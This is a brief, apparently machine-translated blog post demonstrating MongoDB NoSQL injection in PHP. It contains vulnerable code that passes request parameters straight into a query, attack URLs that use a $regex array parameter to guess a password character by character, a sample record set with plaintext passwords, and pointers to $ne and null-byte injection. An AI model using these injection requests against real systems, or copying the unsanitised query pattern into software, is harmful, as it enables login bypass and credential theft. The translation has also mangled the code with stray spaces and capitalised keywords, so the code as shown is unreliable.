<? Php
$ Con = new Mongo ();
$ Db = $ con-> selectDB ("demo")-> selectCollection ("admin ");
Var_dump ($ _ GET ['passwd']);
$ Ds = $ db-> find (array ("username" = >$ _ GET ['username'], "password" => $ _ GET ['passwd']);
Foreach ($ ds as $ k => $ v ){
Var_dump ($ v );
}
?>
The http://www.bkjia.com/mongo/go-1.php? Username = heige & passwd [$ regex] = ^ 1
The http://www.bkjia.com/mongo/go-1.php? Username = heige & passwd [$ regex] = ^ 2
Tested database structure:
> Db. admin. find ()
{"_ Id": ObjectId ("4f562d110920d897e6765ae1"), "uid": 1, "username": "heige", "password": "123456 "}
{"_ Id": ObjectId ("4f5b38ba0920d897e6765ae2"), "uid": 2, "username": "admin", "password": "admin "}
This injection method mainly utilizes the characteristics of PHP and can be directly submitted to the array...
In addition, refer to the two tips of foreigners:
Http://www.idontplaydarts.com/2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/ directly with $ ne this is similar to the common universal password
Http://www.idontplaydarts.com/2011/02/mongodb-null-byte-injection-attacks/ null Byte Injection
Author 5up3rh3i' blog